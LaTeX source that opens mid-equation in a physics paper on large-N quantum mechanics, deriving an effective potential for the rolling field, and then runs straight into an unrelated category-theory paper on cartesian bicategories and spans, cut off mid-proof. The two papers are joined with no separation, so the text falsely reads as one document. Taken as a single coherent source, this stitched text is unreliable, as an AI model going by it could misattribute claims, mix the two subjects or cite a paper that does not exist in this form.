d2\right)^{-\frac{2}{d-2}}\,\left(4\pi\rho\right)^{\frac{d}{d-2}}\,
,\label{Effective_Potential}\end{equation} together with the following value of
the field $\lambda$: \begin{equation}
i\lambda=\left[\frac{(4\pi)^{d/2}\rho}{\Gamma\left(1-\frac
d2\right)}\right]^{\frac{2}{d-2}}\,.\end{equation} The necessity of the second
term in (\ref{Effective_Potential}) is most clearly seen in $d=1$,
where the theory becomes a quantum mechanics. In this case the
effective potential is \begin{equation} U_{eff}(\rho)\Bigl|_{d=1}=
U(\rho)+\frac{1}{8\rho}\,.\label{1d_eff_potential}\end{equation} Consider now
the case of $U=\frac{g_2}{2}\rho$, which corresponds to a system of
$N$ decoupled harmonic oscillators. The last term in
(\ref{Effective_Potential}) shifts the minimum of the potential from
$\rho=0$ to the correct value $\rho=\frac{1}{2\sqrt{g_2}}$. This
term therefore accounts for the spreading of the ground state wave
function.
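Both statements can be checked directly; the following is a sketch
with $\hbar$ and the mass set to one. For constant fields the second
equation in (\ref{scalar_gap}), with $m^2\equiv i\lambda$, is the
standard tadpole integral, which in dimensional regularization gives
\begin{equation}
\rho=\int\frac{d^dk}{(2\pi)^d}\,\frac{1}{k^2+m^2}
=\frac{\Gamma\left(1-\frac d2\right)}{(4\pi)^{d/2}}\,m^{d-2}\,,
\end{equation}
and inverting this relation for $m^2$ reproduces the expression for
$i\lambda$ given above. For the oscillator check, each component of
$\vec{\phi}$ has the Hamiltonian $H=\frac12 p^2+\frac{g_2}{2}\phi_i^2$,
i.e. frequency $\omega=\sqrt{g_2}$, and the ground state indeed has
\begin{equation}
\langle\phi_i^2\rangle=\frac{1}{2\omega}=\frac{1}{2\sqrt{g_2}}\,.
\end{equation}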
If the fields are not constant then, as shown in
\cite{Asnin:2009bs}, the correct form of the equations is \begin{equation}
2U'\bigl(\rho(x)\bigr)=i\lambda(x),\qquad \rho(x)=G(x,x),\qquad
\Bigl(-\Box_x+i\lambda(x)\Bigr)\,G(x,y)=\delta(x-y)\,\label{General_equations}\end{equation}
where $\Box_x$ is a Laplacian w.r.t. $x$.
A major role in the above equations is played by the Green's
function $G(x,y)$. The field $\rho$ is equal to this function at
coincident points. In QFT this is divergent and is to be
regularized. We will concentrate on the case of $d=1$ where no
regularization is needed.
The main difficulty in solving equations (\ref{General_equations})
stems from the fact that $G(x,y)$ is a Green's function of the
operator which involves an unknown function $\lambda(x)$. A
particular exact solution of these equations was found in
\cite{Asnin:2009bs} for $d=3$ and a potential
$U(\rho)=\frac{g_6}{6}\,\rho^3$, which corresponds to a
$\vec{\phi}^6$ model. The particular solution found there corresponds to
vanishing energy. In that case there is no scale in the problem
since the coupling constant $g_6$ is dimensionless in $d=3$.
Therefore the form of the solution is determined by dimensional
analysis up to dimensionless multiplicative constants which can be
fixed.\footnote{Approximate solutions of equations
(\ref{General_equations}) were also considered in \cite{Asnin:2009bs}.} In
this paper we solve the equations (\ref{General_equations}) in the
case of $d=1$.
\section{Classical analysis}\label{Classical_analysis}
In this section we consider a classical version of the large $N$
quantum mechanics. Our main purpose is to write the EOM in a form
that will be convenient for a comparison with its quantum
counterpart. For the same reason we work in the Euclidean signature.
We denote the Euclidean time by $\tau$.
The Euclidean Lagrangian of the system is \begin{equation}
L=\frac12\left(\partial_{\tau}\vec{\phi}\right)^2+NU\left(\frac{\vec{\phi}^2}{N}\right)\,
.\end{equation} We consider a phase with an unbroken global $O(N)$ symmetry,
which means that the field configurations we are interested in are
of the form \begin{equation} \vec{\phi}(\tau)=\phi(\tau)\,\bigl(1,1,\ldots
1\bigr)\, ,\end{equation} where the vector on the RHS has $N$ components. For
such field configurations the Lagrangian can be rewritten as \begin{equation}
L=N\,\Bigl(\frac12\dot{\phi}^2+U(\phi^2)\Bigr)\,,\end{equation} where a dot is
a derivative w.r.t. $\tau$. The Euclidean EOM is \begin{equation}
\ddot{\phi}=\frac{dU}{d\phi}\,.\end{equation}
In order to make this equation resemble the quantum one we introduce
a classical analog of the field $\rho$:\begin{equation}
\rho_{cl}=\frac{\vec{\phi}^2}{N}=\phi^2\,.\end{equation} Then, using the fact that
$\frac{dU}{d\phi}=2\phi\frac{dU}{d\rho}$ one can write a
differential equation of the third order for $\rho_{cl}$:\begin{equation}
\dddot{\rho}_{cl}=8U'(\rho_{cl})\,\dot{\rho}_{cl}+4U''(\rho_{cl})\,\rho_{cl}\,\dot{\rho}_{cl}\,.\label{Classical_eq}\end{equation}
This equation should be supplemented by initial conditions. Suppose
that at $\tau=0$ the field $\phi$ is equal to $\phi_0$ and its time
derivative is $\dot{\phi}_0$. Then the initial conditions for eq.
(\ref{Classical_eq}) are \begin{equation} \rho_{cl}(0)=\phi_0^2,\qquad
\dot{\rho}_{cl}(0)=2\,\phi_0\,\dot{\phi}_0,\qquad
\ddot{\rho}_{cl}(0)=4\,\phi_0^2\,U'\left(\phi_0^2\right)+2\,\dot{\phi}_0^2\,.\end{equation} This
is the EOM in the form of (\ref{Classical_eq}) that will be compared
to the quantum one in the next section.
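For completeness, the chain of substitutions behind
(\ref{Classical_eq}) is short. Differentiating $\rho_{cl}=\phi^2$ and
using $\ddot{\phi}=2\phi\,U'(\phi^2)$,
\begin{equation}
\dot{\rho}_{cl}=2\phi\dot{\phi}\,,\qquad
\ddot{\rho}_{cl}=2\dot{\phi}^2+2\phi\ddot{\phi}=2\dot{\phi}^2+4\rho_{cl}\,U'(\rho_{cl})\,,
\end{equation}
and one more derivative gives
\begin{equation}
\dddot{\rho}_{cl}=4\dot{\phi}\ddot{\phi}+4U'(\rho_{cl})\,\dot{\rho}_{cl}+4U''(\rho_{cl})\,\rho_{cl}\,\dot{\rho}_{cl}
=8U'(\rho_{cl})\,\dot{\rho}_{cl}+4U''(\rho_{cl})\,\rho_{cl}\,\dot{\rho}_{cl}\,,
\end{equation}
since $4\dot{\phi}\ddot{\phi}=8\phi\dot{\phi}\,U'=4U'\dot{\rho}_{cl}$.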
\section{Quantum solution}\label{Quantum_case}
In this section we derive the quantum EOM for the field $\rho$
starting from general equations (\ref{General_equations}). The main
result is that the quantum EOM is again of the form
(\ref{Classical_eq}), but the initial conditions are different. It
will also be shown that a difference in the initial conditions can
be turned into a correction to a potential.
In the case of quantum mechanics eqs. (\ref{General_equations})
reduce to \begin{equation} 2U'\bigl(\rho(\tau)\bigr)=i\lambda(\tau),\qquad
\rho(\tau)=G(\tau,\tau),\qquad
\Bigl(-\pd_{\tau}^2+i\lambda(\tau)\Bigr)\,G(\tau,\tau_0)=\delta(\tau-\tau_0)\,\label{General_equations_1d}\,,\end{equation}
and no regularization is needed.
We are going to consider the rolling of the system from the top of the
potential. Therefore we assume that the fields $\rho$ and $\lambda$
possess limits when $\tau\to\infty$. We will denote the limit of
$i\lambda$ by $m^2$ and assume in what follows that its value is
positive. Then we redefine the field $\lambda$:\begin{equation} i\lambda=i\lambda_1+m^2\,
,\end{equation} so that the new field $\lambda_1$ goes to 0 at infinity. In terms
of this new field the eqs. (\ref{General_equations_1d})
become \begin{eqnarray} 2U'\bigl(\rho(\tau)\bigr)&=&i\lambda_1(\tau)+m^2\label{Rho_eq},\\
\rho(\tau)&=&G_m(\tau,\tau),\\
\Bigl(-\pd_{\tau}^2+i\lambda_1(\tau)+m^2\Bigr)\,G_m(\tau,\tau_0)&=&\delta(\tau-\tau_0)\,\label{General_equations_m}\,,\end{eqnarray}
where the subscript of $G$ indicates the value of the parameter $m$
at which the Green's function is computed.
In one dimension the Green's function is closely related to
solutions of the corresponding homogeneous equation \begin{equation}
\Bigl(-\pd_{\tau}^2+i\lambda_1(\tau)+m^2\Bigr)\,g(\tau)=0\,.\label{Homogeneous_eq}\end{equation}
Since $\lambda_1$ vanishes at infinity, the solutions of this equation
behave at infinity as $e^{\pm m\tau}$ (this approach is similar to
that used in \cite{Feinberg:1994qq}). We choose two linearly
independent solutions $g_{1,2}$ of the homogeneous equation so that
the function $g_1(\tau)$ goes to 0 as $\tau\to-\infty$ and
$g_2(\tau)$ goes to 0 as $\tau\to+\infty$. We will fix their
normalization later.
In terms of these solutions the Green's function can be written as
\begin{equation} G_m(\tau, \tau_0)=\Biggl\{\begin{array}{c}
\alpha_1\,g_1(\tau),\qquad \tau<\tau_0 \\
\alpha_2\,g_2(\tau),\qquad \tau>\tau_0
\end{array}\end{equation}
where the coefficients $\alpha_{1,2}$ satisfy \begin{equation}
\alpha_1\,g_1(\tau_0)=\alpha_2\,g_2(\tau_0),\qquad
\alpha_1\,g'_1(\tau_0)-\alpha_2\,g'_2(\tau_0)=1\,.\end{equation} Solving these
equations leads to the following expression for the Green's
function: \begin{equation} G_m(\tau,
\tau_0)=\frac{1}{W(g_1,g_2)}\,\Biggl\{\begin{array}{c}
g_1(\tau)\,g_2(\tau_0),\qquad \tau<\tau_0 \\
g_1(\tau_0)\,g_2(\tau),\qquad \tau>\tau_0
\end{array}\end{equation}
where $W(g_1,g_2)\equiv g'_1(\tau)g_2(\tau)-g'_2(\tau)g_1(\tau)$ is
the Wronskian of the two solutions. It is independent of $\tau$ and we
fix the normalization of the basic solutions $g_{1,2}(\tau)$ so that
$W(g_1,g_2)=1$. With this normalization \begin{equation} G_m(\tau,
\tau_0)=\Biggl\{\begin{array}{c}
g_1(\tau)\,g_2(\tau_0),\qquad \tau<\tau_0 \\
g_1(\tau_0)\,g_2(\tau),\qquad \tau>\tau_0
\end{array}\end{equation}
and the Green's function at coincident points (which is equal to
$\rho$) is \begin{equation}
G_m(\tau,\tau)\equiv\rho(\tau)=g_1(\tau)g_2(\tau)\,.\end{equation} Using eq.
(\ref{Homogeneous_eq}) we write the equation for $\rho$:\begin{equation}
\dddot{\rho}=4\bigl(i\lambda_1+m^2\bigr)\,\dot{\rho}+2\,i\dot{\lambda}_1\,\rho\,.\end{equation}
Now, using (\ref{Rho_eq}) we get \begin{equation}
\dddot{\rho}=8U'(\rho)\,\dot{\rho}+4U''(\rho)\,\rho\dot{\rho}\,.\label{Quantum_eq}\end{equation}
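The step from $\rho=g_1g_2$ to this equation uses only the homogeneous
equation $\ddot{g}_{1,2}=\bigl(i\lambda_1+m^2\bigr)g_{1,2}$:
\begin{equation}
\dot{\rho}=\dot{g}_1g_2+g_1\dot{g}_2\,,\qquad
\ddot{\rho}=2\bigl(i\lambda_1+m^2\bigr)\rho+2\dot{g}_1\dot{g}_2\,,
\end{equation}
so that
\begin{equation}
\dddot{\rho}=2\,i\dot{\lambda}_1\,\rho+2\bigl(i\lambda_1+m^2\bigr)\dot{\rho}
+2\bigl(i\lambda_1+m^2\bigr)\bigl(g_1\dot{g}_2+\dot{g}_1g_2\bigr)
=4\bigl(i\lambda_1+m^2\bigr)\dot{\rho}+2\,i\dot{\lambda}_1\,\rho\,,
\end{equation}
and substituting $i\lambda_1+m^2=2U'(\rho)$, so that
$i\dot{\lambda}_1=2U''(\rho)\dot{\rho}$, gives (\ref{Quantum_eq}).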
This equation precisely coincides with the classical equation
(\ref{Classical_eq}). However, this does not mean that the possible
motions of the system are the same, since we need to specify initial
conditions. Eqs. (\ref{Classical_eq}, \ref{Quantum_eq}) are of the
third order and should be integrated once to be brought to a usual
form of equations of dynamics.
In order to integrate eq. (\ref{Quantum_eq}) once, we define a new
field in analogy with the classical case:\begin{equation} \Phi=\sqrt{\rho}\,.\end{equation}
In terms of this new field a first integral of eq.
(\ref{Quantum_eq}) can be written as \begin{equation}
\ddot{\Phi}=\frac{dU}{d\Phi}+\frac{\alpha}{\Phi^3}\,.\label{Quantum_Phi_eq}\end{equation}
Here $\alpha$ is an integration constant. In order to fix it
consider constant solutions of (\ref{Quantum_Phi_eq}). They are
given by extrema of the function \begin{equation}
\bar{U}(\Phi^2)=U(\Phi^2)-\frac{\alpha}{2\Phi^2}\,,\end{equation} or if we
rewrite it in terms of $\rho$, by extrema of \begin{equation}
\bar{U}(\rho)=U(\rho)-\frac{\alpha}{2\rho}\,.\end{equation} We see that the
function $\bar{U}$ is of the form of a general effective potential
of the large $N$ vector model at $d=1$, which is given in
(\ref{1d_eff_potential}). This fixes $\alpha=-1/4$, and the
effective potential becomes \begin{equation}
U_{eff}(\Phi^2)=U(\Phi^2)+\frac{1}{8\Phi^2}\,.\label{Quantum_effective_potential}\end{equation}
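One can verify directly that (\ref{Quantum_Phi_eq}) is a first
integral of (\ref{Quantum_eq}) for any value of $\alpha$. Writing
(\ref{Quantum_Phi_eq}) as $\ddot{\Phi}=2\Phi\,U'(\Phi^2)+\alpha\Phi^{-3}$
and using $\rho=\Phi^2$,
\begin{equation}
\dddot{\rho}=6\dot{\Phi}\ddot{\Phi}+2\Phi\dddot{\Phi}
=16\Phi\dot{\Phi}\,U'(\rho)+8\Phi^3\dot{\Phi}\,U''(\rho)
=8U'(\rho)\,\dot{\rho}+4U''(\rho)\,\rho\,\dot{\rho}\,,
\end{equation}
the $\alpha$-dependent terms cancelling between
$6\dot{\Phi}\ddot{\Phi}$ and $2\Phi\dddot{\Phi}$. The constant
$\alpha$ is therefore not fixed by the equation itself, only by the
matching to the effective potential performed above.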
The quantum EOM can be written in terms of the field $\Phi$ as \begin{equation}
\ddot{\Phi}=\frac{dU(\Phi^2)}{d\Phi}-\frac{1}{4\Phi^3}\,,\end{equation} or,
Wick rotating back to the Lorentzian time $t$, \begin{equation}
\ddot{\Phi}=-\frac{dU(\Phi^2)}{d\Phi}+\frac{1}{4\Phi^3}\,.\label{Quantum_Phi_eq_fixed_const}\end{equation}
This equation by construction correctly reproduces the extrema of
the quantum effective potential (\ref{1d_eff_potential}). Other
solutions of this equation describe time-dependent processes in the
system.
We have proven that the quantum mechanical EOM for the expectation
value of the field $\Phi$ (or $\rho$) has the form of the classical
EOM but with a corrected potential. Therefore classical intuition
about the motion of the system applies directly to the quantum case.
For example, the frequency of small oscillations around a minimum of
the effective potential is given by
$\omega^2=U_{eff}^{\prime\prime}(\Phi_0)$, where $\Phi_0$ is the
expectation value of the field $\sqrt{\rho}$ at the minimum of
$U_{eff}$. One can also draw a phase portrait on the phase plane
which describes qualitatively all possible motions of the
system. In addition, quantum mechanical tunneling is not
allowed. This is a consequence of the large $N$ limit. We show this
in a different way in appendix \ref{Tunneling}, where we also show
that the tunneling amplitude goes to zero as
$\pi^{N/2}\left[(N/2)!\right]^{-1}$.
\section{Summary and discussion}\label{Summary}
In this paper we considered large $N$ quantum mechanics with an
unbroken global $O(N)$ symmetry. We found that the mean value of the
square of the field satisfies a classical EOM with a modified
potential (\ref{Quantum_effective_potential}). Since the EOM is
purely classical we conclude that the correction to the potential is
the only difference between the classical action and the 1PI
effective action which governs the quantum evolution. In particular,
there are no terms with time derivatives, contrary to the case of
$d=3$, where such terms are present \cite{Asnin:2009bs}. This result
allows one to compute all characteristics of time-dependent
processes in an arbitrary potential (frequencies of oscillations
around minima of the potential, characteristic times of rolling, the
phase portrait, etc.) by the conventional means of classical
mechanics. It also follows that tunneling in the system is
suppressed in the large $N$ limit.
A desirable continuation of this work is to find a way to solve the
quantum EOMs in higher dimensions. This is much
more difficult, however. Although a reduction of the problem to a
one-dimensional case is always possible (assuming that the solution
we are looking for depends only on time), an expression for the
field $\rho$ in terms of solutions of a homogeneous equation similar to
(\ref{Homogeneous_eq}) will in general involve an integral over a
mass, a fact that significantly complicates the computation.
\section*{Acknowledgements}
I thank S. Elitzur, E. Rabinovici and M. Smolkin for discussions and
useful comments.
\section{Introduction}\label{intro}
Let ${\cal E}$ be a category with finite limits. For the bicategory $\mathrm{Span}\,{\cal E}$,
the locally full subbicategory $\mathrm{Map}\mathrm{Span}\,{\cal E}$ determined by the left adjoint
arrows is essentially locally discrete, meaning that each hom category
$\mathrm{Map}\mathrm{Span}\,{\cal E}(X,A)$ is an equivalence relation, and so is equivalent to a
discrete category. Indeed, a span
$x{\kern -.25em}:{\kern -.25em} X\,{\s\toleft}\, S{\,\s\to}\, A{\kern -.25em}:{\kern -.25em} a$ has a right adjoint if and only if $x{\kern -.25em}:{\kern -.25em} S{\,\s\to}\, X$ is
invertible. The functors
$$\mathrm{Map}\mathrm{Span}\,{\cal E}(X,A)\to{\cal E}(X,A)\quad\mbox{given by}\quad(x,a)\mapsto ax^{-1}$$
provide equivalences of categories which are the effects on homs for a
biequivalence
$$\mathrm{Map}\mathrm{Span}\,{\cal E}{\,\s\to}\,{\cal E}\, .$$
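Here it is worth recalling that composition in $\mathrm{Span}\,{\cal E}$ is given
by pullback: the composite of spans $X\xleftarrow{x}S\xrightarrow{a}A$
and $A\xleftarrow{u}T\xrightarrow{b}B$ is
$$X\xleftarrow{\;xp\;}S\times_A T\xrightarrow{\;br\;}B\,,$$
where $p$ and $r$ are the projections of the pullback of $u$ along
$a$. Composition is associative only up to the canonical isomorphisms
between pullbacks, which is why $\mathrm{Span}\,{\cal E}$ is a bicategory rather
than a mere 2-category.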
Since ${\cal E}$ has finite products, $\mathrm{Map}\mathrm{Span}\,{\cal E}$ has finite products
{\em as a bicategory}. We refer the reader to \cite{ckww} for a
thorough treatment of bicategories with finite products.
Each hom category $\mathrm{Span}\,{\cal E}(X,A)$ is {\em isomorphic} to the slice
category ${\cal E}/(X\times A)$ which has binary products given by pullback in
${\cal E}$ and terminal object $1{\kern -.25em}:{\kern -.25em} X\times A{\,\s\to}\, X\times A$. Thus $\mathrm{Span}\,{\cal E}$ is a
{\em precartesian bicategory} in the sense of \cite{ckww}. The
canonical lax monoidal structure
$$\mathrm{Span}\,{\cal E}\times \mathrm{Span}\,{\cal E}\to\mathrm{Span}\,{\cal E}\toleft\mathbf{1}$$
for this precartesian bicategory is seen to have its binary aspect
given on arrows by
$$(X\xleftarrow{x} S \xrightarrow{a} A\,,\, Y\xleftarrow{y} T\xrightarrow{b} B )
\mapsto (X\times Y \xleftarrow{x\times y} S\times T \xrightarrow{a\times b} A\times B)\, ,$$
and its nullary aspect provided by
$$1\xleftarrow1 1 \xrightarrow1 1\, ,$$
the terminal object of $\mathrm{Span}\,{\cal E}(1,1)$. Both of these lax functors are
readily seen to be pseudofunctors so that $\mathrm{Span}\,{\cal E}$ is a {\em cartesian
bicategory} as in \cite{ckww}.
The purpose of this paper is to characterize those cartesian bicategories
$\mathbf{B}$ which are biequivalent to $\mathrm{Span}\,{\cal E}$, for some category ${\cal E}$ with
finite limits. Certain aspects of a solution to the problem are immediate.
A biequivalence $\mathbf{B}\sim\mathrm{Span}\,{\cal E}$ provides $$\mathrm{Map}\mathbf{B}\sim\mathrm{Map}\mathrm{Span}\,{\cal E}\sim{\cal E}$$
so that we must ensure firstly that $\mathrm{Map}\mathbf{B}$ is essentially locally discrete.
From the characterization of bicategories of relations as locally ordered
cartesian bicategories in \cite{caw} one suspects that the following axiom
will figure prominently in providing essential local discreteness for
$\mathrm{Map}\mathbf{B}$.
\axm\label{frob}{\em Frobenius:}\quad A cartesian bicategory $\mathbf{B}$
is said to satisfy the {\em Frobenius} axiom if, for each $A$ in $\mathbf{B}$,
$A$ is Frobenius.
\eth
\noindent
Indeed Frobenius objects in cartesian bicategories were defined
and studied in \cite{ww} where amongst other things it is shown that if $A$
is Frobenius in cartesian $\mathbf{B}$ then, for all $X$, $\mathrm{Map}\mathbf{B}(X,A)$ is a
groupoid. (This theorem was generalized considerably in \cite{lsw} which
explained further aspects of the Frobenius concept.) However, essential local
discreteness for $\mathrm{Map}\mathbf{B}$ requires also that the $\mathrm{Map}\mathbf{B}(X,A)$ be
ordered sets (which is automatic for locally ordered $\mathbf{B}$). Here we
study also {\em separable} objects in cartesian bicategories for which we
are able to show that if $A$ is separable in cartesian $\mathbf{B}$ then,
for all $X$, $\mathrm{Map}\mathbf{B}(X,A)$ is an ordered set and a candidate axiom is:
\axm\label{sepax}{\em Separable:}\quad A cartesian bicategory $\mathbf{B}$
is said to satisfy the {\em Separable} axiom if, for each $A$ in $\mathbf{B}$,
$A$ is separable.
\eth
In addition to essential local discreteness, it is clear that we will
need an axiom which provides {\em tabulation} of each arrow of $\mathbf{B}$
by a span of maps. Since existence of Eilenberg-Moore objects is a
basic 2-dimensional limit concept, we will express tabulation in terms of
this requirement; we note that existence of pullbacks in $\mathrm{Map}\mathbf{B}$
follows easily from tabulation. In the bicategory $\mathrm{Span}\,{\cal E}$, the comonads
$G{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, A$ are precisely the symmetric spans $g{\kern -.25em}:{\kern -.25em} A\,{\s\toleft}\, X{\,\s\to}\, A{\kern -.25em}:{\kern -.25em} g$;
the map $g{\kern -.25em}:{\kern -.25em} X{\,\s\to}\, A$ together with $g\eta_g{\kern -.25em}:{\kern -.25em} g{\,\s\to}\, gg^*g$ provides an
Eilenberg-Moore coalgebra for $g{\kern -.25em}:{\kern -.25em} A\,{\s\toleft}\, X{\,\s\to}\, A{\kern -.25em}:{\kern -.25em} g$.
We will posit:
\axm\label{emc}{\em Eilenberg-Moore for Comonads:}\quad Each comonad
$(A,G)$ in $\mathbf{B}$ has an Eilenberg-Moore object.
\eth
Conversely, any map (left adjoint) $g{\kern -.25em}:{\kern -.25em} X{\,\s\to}\, A$ in $\mathrm{Span}\,{\cal E}$ provides
an Eilenberg-Moore object for the comonad $gg^*$.
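Recall that, in any bicategory, an adjunction
$\eta_g,\epsilon_g{\kern -.25em}:{\kern -.25em} g\dashv g^*$ makes $G=gg^*$ a comonad with counit
and comultiplication
$$\epsilon=\epsilon_g{\kern -.25em}:{\kern -.25em} gg^*{\,\s\to}\, 1_A\,,\qquad
\delta=g\eta_g g^*{\kern -.25em}:{\kern -.25em} gg^*{\,\s\to}\, gg^*gg^*\,,$$
the comonad identities being instances of the triangle equations for
$\eta_g$ and $\epsilon_g$. In $\mathrm{Span}\,{\cal E}$, where $g^*$ is the reversal
of the span $g$, this is exactly the comonad structure on the
symmetric span $g{\kern -.25em}:{\kern -.25em} A\,{\s\toleft}\, X{\,\s\to}\, A{\kern -.25em}:{\kern -.25em} g$ referred to above.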
\noindent
We further posit:
\axm\label{mc}{\em Maps are Comonadic:}\quad Each left adjoint $g{\kern -.25em}:{\kern -.25em} X{\,\s\to}\, A$
in $\mathbf{B}$ is comonadic.
\eth
\noindent
from which, in our context, we can also deduce the Frobenius and
Separable axioms.
In fact we shall also give, in Proposition~\ref{easy} below, a straightforward proof
that $\mathrm{Map}\mathbf{B}$ is locally essentially discrete whenever Axiom~\ref{mc} holds.
But due to the importance of the Frobenius and separability conditions in other
contexts, we have chosen to analyze them in their own right.
\section{Preliminaries}\label{prelim}
We recall from \cite{ckww} that a bicategory $\mathbf{B}$ (always, for
convenience, assumed to be normal) is said to be
{\em cartesian} if the subbicategory of maps (by which we mean
left adjoint arrows), $\mathbf{M}=\mathrm{Map}\mathbf{B}$, has finite products $-\times-$
and $1$; each hom-category $\mathbf{B}(B,C)$ has finite products $-\wedge-$
and $\top$; and a certain derived tensor product $-\otimes-$ and $I$
on $\mathbf{B}$, extending the product structure of $\mathbf{M}$, is functorial.
As in \cite{ckww},
we write $p$ and $r$ for the first and second projections at the global level,
and similarly $\pi$ and $\rho$ for the projections at the local level.
If $f$ is a map of $\mathbf{B}$ --- an arrow of $\mathbf{M}$ --- we will write
$\eta_f,\epsilon_f{\kern -.25em}:{\kern -.25em} f\dashv f^*$ for a chosen adjunction in $\mathbf{B}$
that makes it so. It was shown that the derived tensor product of a
cartesian bicategory underlies a symmetric monoidal bicategory
structure. We recall too that in \cite{ww} Frobenius objects in a
general cartesian bicategory were defined and studied. We will need
the central results of that paper too. Throughout this paper, $\mathbf{B}$
is assumed to be a cartesian bicategory.
As in \cite{ckww} we write
$$\bfig
\Atriangle/->`->`/[\mathbf{G}={\rm Gro}\mathbf{B}`\mathbf{M}`\mathbf{M};\partial_0`\partial_1`]
\efig$$
for the Grothendieck span corresponding to
$$\mathbf{M}{^\mathrm{op}}\times\mathbf{M}\to^{i{^\mathrm{op}}\times i}\mathbf{B}{^\mathrm{op}}\times\mathbf{B}\to^{\mathbf{B}(-,-)}\mathbf{CAT}$$
where $i{\kern -.25em}:{\kern -.25em}\mathbf{M}{\,\s\to}\,\mathbf{B}$ is the inclusion. A typical arrow of $\mathbf{G}$,
$(f,\alpha,u){\kern -.25em}:{\kern -.25em}(X,R,A){\,\s\to}\,(Y,S,B)$ can be depicted by a square
\begin{equation}\label{square}
\bfig
\square(0,0)[X`Y`A`B;f`R`S`u]
\morphism(125,250)|m|<250,0>[`;\alpha]
\efig
\end{equation}
and such arrows are composed by pasting. A 2-cell
$(\phi,\psi){\kern -.25em}:{\kern -.25em}(f,\alpha,u){\,\s\to}\,(g,\beta,v)$ in $\mathbf{G}$ is a pair of
2-cells $\phi{\kern -.25em}:{\kern -.25em} f{\,\s\to}\, g$, $\psi{\kern -.25em}:{\kern -.25em} u{\,\s\to}\, v$ in $\mathbf{M}$ which satisfy
the obvious equation. The (strict) pseudofunctors $\partial_0$
and $\partial_1$ should be regarded as {\em domain} and {\em codomain}
respectively. Thus, applied to (\ref{square}), $\partial_0$ gives $f$
and $\partial_1$ gives $u$. The bicategory $\mathbf{G}$ also has finite products,
which are given on objects by $-\otimes-$ and $I$; these are preserved by
$\partial_0$ and $\partial_1$.
The Grothendieck span can also be thought of as giving a double category
(of a suitably weak flavour), although we shall not emphasize that point of view.
\subsection{}\label{xredux}
The arrows of $\mathbf{G}$ are particularly well suited to relating the
various product structures in a cartesian bicategory. In 3.31 of
\cite{ckww} it was shown that the local binary product, for
$R,S{\kern -.25em}:{\kern -.25em} X{\scalefactor{0.5} \two}A$, can be recovered to within isomorphism from
the defined tensor product by
$$R\wedge S\cong d^*_A(R\otimes S)d_X$$
A slightly more precise version of this is that
the mate of the isomorphism above, with respect to the single
adjunction $d_A\dashv d^*_A$, defines an arrow in $\mathbf{G}$
$$\bfig
\square(0,0)[X`X\otimes X`A`A\otimes A;d_X`R\wedge S`R\otimes S`d_A]
\morphism(125,250)|m|<250,0>[`;]
\efig$$
which when composed with the projections of $\mathbf{G}$, recovers the
local projections as in
$$
\bfig
\square(0,0)|almb|[X`X\otimes X`A`A\otimes A;d_X`R\wedge S`R\otimes S`d_A]
\morphism(125,250)|m|<250,0>[`;]
\square(500,0)|amrb|[X\otimes X`X`A\otimes A`A;p_{X,X}`R\otimes S`R`p_{A,A}]
\morphism(625,250)|m|<250,0>[`;\tilde p_{R,S}]
\place(1250,250)[\cong]
\square(1550,0)|almb|[X`X`A`A;1_X`R\wedge S`R`1_A]
\morphism(1675,250)|m|<250,0>[`;\pi]
\efig$$
for the first projection, and similarly for the second.
The unspecified $\cong$ in $\mathbf{G}$ is given by a pair of
convenient isomorphisms $p_{X,X}d_X\cong 1_X$ and $p_{A,A}d_A\cong 1_A$
in $\mathbf{M}$. Similarly, when $R\wedge S{\,\s\to}\, R\otimes S$ is composed
with $(r_{X,X},\tilde r_{R,S},r_{A,A})$ the result is
$(1_X,\rho,1_A){\kern -.25em}:{\kern -.25em} R\wedge S{\,\s\to}\, S$.
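In $\mathrm{Span}\,{\cal E}$ this formula recovers the description of local products
from the Introduction: regarding $R,S{\kern -.25em}:{\kern -.25em} X{\scalefactor{0.5} \two}A$ as objects
$R{\,\s\to}\, X\times A$ and $S{\,\s\to}\, X\times A$ of the slice category
${\cal E}/(X\times A)$, the composite $d^*_A(R\otimes S)d_X$ is computed by
pulling back $R\times S{\,\s\to}\,(X\times X)\times(A\times A)$ along
$d_X\times d_A$, so that
$$R\wedge S\cong R\times_{X\times A}S\,,$$
the binary product in ${\cal E}/(X\times A)$.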
\subsection{}\label{bc}
Quite generally, an arrow of $\mathbf{G}$ as given by the square (\ref{square})
will be called a {\em commutative} square if $\alpha$ is invertible.
An arrow of $\mathbf{G}$ will be said to satisfy the
{\em Beck condition} if the mate
of $\alpha$ under the adjunctions $f\dashv f^*$ and $u\dashv u^*$, as given
in the square below (no longer an arrow of $\mathbf{G}$), is invertible.
$$\bfig
\square(1000,0)/<-`->`->`<-/[X`Y`A`B;f^*`R`S`u^*]
\morphism(1125,250)|m|<250,0>[`;\alpha^*]
\efig$$
Thus Proposition 4.7 of \cite{ckww} says that projection squares of the
form $\tilde p_{R,1_Y}$ and $\tilde r_{1_X,S}$ are commutative while
Proposition 4.8 of \cite{ckww} says that these same squares satisfy
the Beck condition.
If $R$ and $S$ are also maps and $\alpha$ is invertible then
$\alpha^{-1}$ gives rise to another arrow of $\mathbf{G}$, from $f$ to $u$
with reference to the square above, which may or may
not satisfy the Beck condition. The point here is that a
commutative square of maps gives rise to two, generally distinct,
Beck conditions. It is well known that, for bicategories
of the form $\mathrm{Span}\,{\cal E}$ and $\mathrm{Rel}\,{\cal E}$, all pullback
squares of maps satisfy both Beck conditions. A category
with finite products has automatically a number of pullbacks which
we might call {\em product-absolute} pullbacks because they are
preserved by all functors which preserve products. In \cite{ww}
the Beck conditions for the product-absolute pullback squares of the form
$$\bfig
\Square(1000,0)/->`<-`<-`->/[A\times A`A\times A\times A`A`A\times A;d\times A`d`A\times d`d]
\efig$$
were investigated.
(In fact, in this case it was shown that either Beck condition
implies the other.) The objects for which these conditions
are met are called {\em Frobenius} objects.
\prp\label{mcifro} For a cartesian bicategory, the axiom {\em Maps are Comonadic}
implies the axiom {\em Frobenius}.
\eth
\prf It suffices to show that the 2-cell $\delta_1$ below is invertible:
$$\bfig
\square(0,0)|alrb|/<-`->``<-/<750,500>%
[A`A\otimes A`A\otimes A`A\otimes(A\otimes A);d^*`d``1\otimes d^*]
\morphism(750,500)|r|<0,-250>[A\otimes A`(A\otimes A)\otimes A;d\otimes 1]
\morphism(750,250)|r|<0,-250>[(A\otimes A)\otimes A`A\otimes(A\otimes A);a]
\morphism(175,250)|a|<150,0>[`;\delta_1]
\square(0,-500)|blrb|/<-`->`->`<-/<750,500>%
[A\otimes A`A\otimes(A\otimes A)`A`A\otimes A;1\otimes d^*`r`r`d^*]
